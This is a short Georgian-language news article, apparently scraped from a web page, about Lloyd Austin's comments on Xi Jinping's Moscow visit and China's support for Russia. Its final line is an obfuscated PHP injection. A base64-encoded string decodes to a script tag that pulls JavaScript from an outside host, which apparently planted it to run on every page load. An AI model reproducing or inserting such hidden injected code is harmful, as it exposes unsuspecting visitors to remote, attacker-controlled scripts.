celsiusi
ავერსი საქკაბელი
ამერიკის შეერთებული შტატების თავდაცვის მინისტრის, ლოიდ ოსტინის განცხადებით, ჩინეთის ლიდერის სი ძინპინის მოსკოვში ვიზიტი, სადაც ის რუსეთის პრეზიდენტს, ვლადიმერ პუტინს შეხვდა და ხელი მოაწერა რამდენიმე დოკუმენტს, აგზავნის "შემაშფოთებელ სიგნალს", რომ ჩინეთი მზად არის რუსეთის მხარდასაჭერად.
„სი ძინპინის ვიზიტი პუტინთან და იქ მისი მრავალდღიანი ყოფნა, ვფიქრობ, ძალიან შემაშფოთებელი გზავნილია, (რუსეთისთვის) მხარდაჭერის გზავნილი“, - აღნიშნა ოსტინმა.
მისი თქმით, მიუხედავად იმისა, ამჟამად არ არსებობს იმის მტკიცებულება, რომ ჩინეთი რუსეთს ლეტალურ დახმარებას უწევს, სი ძინპინის მოსკოვში ვიზიტი და მისი შეხვედრა რუს დიქტატორ პუტინთან არსებითად "იქცა მხარდაჭერის დემონსტრირებად" რუსეთის პრეზიდენტის მიმართ, რაც თავისთავად "ძალიან შემაშფოთებელია".
ოსტინმა აღნიშნა, რომ თუ ჩინეთი მატერიალურ დახმარებას გაუწევს რუსეთს, ეს პოტენციურად იმოქმედებს უკრაინის წინააღმდეგ რუსეთის ომის გაგრძელებაზე და გააფართოებს მის გავლენას არა მხოლოდ რეგიონის მასშტაბით, არამედ მთელ მსოფლიოში.
281
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");